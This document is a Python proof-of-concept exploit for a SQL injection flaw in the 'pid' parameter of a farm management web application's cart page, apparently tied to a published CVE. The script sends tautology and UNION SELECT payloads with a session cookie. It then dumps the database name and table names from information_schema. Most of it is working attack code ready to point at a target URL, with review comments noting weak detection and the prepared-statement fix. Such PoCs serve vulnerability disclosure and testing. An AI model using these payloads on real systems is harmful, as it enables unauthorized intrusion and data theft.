# CVE-2025-11478 - SourceCodester Farm Management System SQL Injection PoC
# Vulnerability: SQL Injection via 'pid' parameter in /myCart.php
# Author: DrNbnonono
import requests
import sys
# Placeholder endpoint kept from the original PoC; nothing below reads it
# (the entry point takes the URL from sys.argv[1] instead).
TARGET_URL = "http://target.com/myCart.php"
def exploit_sql_injection(target_url, session_cookie):
    """
    Probe the ``pid`` query parameter of ``target_url`` for SQL injection.

    Sends two GET requests, passing ``session_cookie`` verbatim as the
    ``Cookie`` header.  The first carries a tautology payload and scans the
    response body (case-insensitively) for a fixed list of database error
    strings; the second carries a UNION probe and is counted as a hit on
    any HTTP 200, regardless of the body content.

    Args:
        target_url: Full URL of the myCart.php endpoint.
        session_cookie: Raw ``Cookie`` header value (e.g. ``PHPSESSID=...``).

    Returns:
        True if an error string is found in the first response, or if the
        second request returns HTTP 200.  False if the first request is not
        HTTP 200 or a ``requests`` exception occurs.  When the first request
        is 200 but the second is not, control falls off the end and the
        function returns None.

    NOTE(review): indentation was lost in this listing; the ``else`` below is
    paired with the first status check on the strength of its "Request
    failed" message.  The UNION branch is a weak signal: any page that
    renders normally for an unexpected ``pid`` also yields True, so a True
    result is not proof of the vulnerability on its own.  The server-side
    defect this targets is presumably unparameterized use of ``pid`` in a
    query; the fix on that side is a prepared statement, not output filtering.
    """
    # Basic SQL injection payload to test the vulnerability
    payload = "1' OR '1'='1"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Cookie": session_cookie,
        # Only meaningful with a request body; this GET sends none, so the
        # header has no effect.
        "Content-Type": "application/x-www-form-urlencoded"
    }
    params = {
        "pid": payload
    }
    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request successful - Status: {response.status_code}")
            print(f"[+] Response length: {len(response.text)}")
            # Check for SQL error messages indicating vulnerability
            # (relies on verbose database errors reaching the page; a
            # deployment that suppresses them produces no match here).
            sql_errors = [
                "You have an error in your SQL syntax",
                "mysql_fetch_array()",
                "mysql_num_rows()",
                "Warning: mysql",
                "unclosed quotation mark"
            ]
            for error in sql_errors:
                if error.lower() in response.text.lower():
                    print(f"[+] SQL Injection confirmed! Error pattern found: {error}")
                    return True
            # UNION-based injection to extract data
            union_payload = "1' UNION SELECT 1,2,3,4,5-- -"
            params["pid"] = union_payload
            response = requests.get(target_url, params=params, headers=headers, timeout=10)
            # Any 200 counts as success here; the body is not inspected.
            if response.status_code == 200:
                print(f"[+] UNION injection test - Response length: {len(response.text)}")
                return True
        else:
            print(f"[-] Request failed - Status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        # Covers connection, timeout and other transport-level failures.
        print(f"[-] Error: {e}")
        return False
def extract_database_info(target_url, session_cookie):
    """
    Print the server's responses to two UNION-based ``pid`` payloads.

    The first payload selects ``database()``; the second selects the table
    names of the current schema from ``information_schema``.  Only the first
    500 characters of each response body are printed; nothing is parsed,
    validated or returned.

    Args:
        target_url: Full URL of the myCart.php endpoint.
        session_cookie: Raw ``Cookie`` header value.

    Raises:
        requests.exceptions.RequestException: propagated unchanged - unlike
        ``exploit_sql_injection`` there is no try/except here, and
        ``status_code`` is never checked before printing.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Cookie": session_cookie
    }
    # Extract database name
    payload = "1' UNION SELECT database(),2,3,4,5-- -"
    params = {"pid": payload}
    response = requests.get(target_url, params=params, headers=headers, timeout=10)
    # Raw body excerpt; printed whether or not the request succeeded.
    print(f"[+] Database info response: {response.text[:500]}")
    # Extract table names
    payload_tables = "1' UNION SELECT group_concat(table_name),2,3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -"
    params["pid"] = payload_tables
    response = requests.get(target_url, params=params, headers=headers, timeout=10)
    print(f"[+] Tables: {response.text[:500]}")
if __name__ == "__main__":
    # Command-line driver: requires the endpoint URL and a raw Cookie header
    # value for an already authenticated session.
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <session_cookie>")
        print(f"Example: {sys.argv[0]} http://target.com/myCart.php 'PHPSESSID=abc123'")
        sys.exit(1)
    target, cookie = sys.argv[1:3]
    print(f"[*] Targeting: {target}")
    print(f"[*] Testing SQL injection vulnerability...")
    # exploit_sql_injection returns True/False/None; only a truthy result
    # proceeds to the extraction step.
    vulnerable = exploit_sql_injection(target, cookie)
    if not vulnerable:
        print("[-] Target may not be vulnerable or requires authentication")
    else:
        print("[+] Vulnerability confirmed! Extracting data...")
        extract_database_info(target, cookie)